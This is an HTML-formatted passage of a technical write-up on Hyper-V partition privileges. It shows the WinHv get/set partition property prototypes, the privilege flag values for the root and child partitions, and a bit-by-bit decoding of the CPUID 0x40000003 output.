<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out PHV_PARTITION_PROPERTY</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, if necessary, these privileges can be changed, causing root-partition in the following function:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetPartitionProperty(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_ID</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PartitionId,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY_CODE</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyCode,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in HV_PARTITION_PROPERTY</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PropertyValue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for the root partition: 000039FF00001FFF</span></div>
<div dir="ltr" style="margin-left: 22.35pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="246"></col><col width="170"></col><col width="170"></col></colgroup><tbody>
<tr style="height: 165px;"><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpRunTimeMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceCounter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSynicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSyntheticTimerMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessApicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessHypercallMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpIndex</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessResetMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessStatsMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceTsc</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessGuestIdleMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessFrequencyMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessDebugMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CreatePartitions</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionId</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessMemoryPool</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AdjustMessageBuffers</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CreatePort</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessStats</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging</span><span style="background-color: transparent; color: red; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CpuManagement</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 1.7pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConfigureProfiler</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value of HvPartitionPropertyPrivilegeFlags for child partition 000008B000000E7F:</span></div>
<div dir="ltr" style="margin-left: 29.45pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="288"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 119px;"><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpRunTimeMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceCounter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSynicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessSyntheticTimerMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessApicMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessHypercallMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: -5.65pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessVpIndex</span></div>
</td><td style="border: 0px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessPartitionReferenceTsc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessGuestIdleMsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AccessFrequencyMsrs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a Windows guest OS, privileges can be obtained by placing EAX 0x40000003 and following the instructions CPUID (in document Hypervisor Functional Specification top-level 4.0 a given interpretation of the results of the cpuid).</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CPUID 40000003 called</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EAX = 00000E7F (00001110 01111111)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 0: VP Runtime (HV_X64_MSR_VP_RUNTIME)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1: Partition Reference Counter (HV_X64_MSR_TIME_REF_COUNT)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 2: Basic SynIC MSRs (HV_X64_MSR_SCONTROL through HV_X64_MSR_EOM and HV_X64_MSR_SINT0 through HV_X64_MSR_SINT15)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 3: Synthetic Timer MSRs (HV_X64_MSR_STIMER0_CONFIG through HV_X64_MSR_STIMER3_COUNT) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4: APIC access MSRs (HV_X64_MSR_EOI, HV_X64_MSR_ICR and HV_X64_MSR_TPR) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5: Hypercall MSRs (HV_X64_MSR_GUEST_OS_ID and HV_X64_MSR_HYPERCALL) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 6: Access virtual processor index MSR (HV_X64_MSR_VP_INDEX)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX = 000008B0 (00001000 10110000)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 11:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ECX = 00000002 (00000000 00000010)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Maximum Processor Power State is C2</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EDX = 000007B2 (00000111 10110010)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest debugging support is available</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for passing hypercall input parameter block via XMM registers is available</span></div>
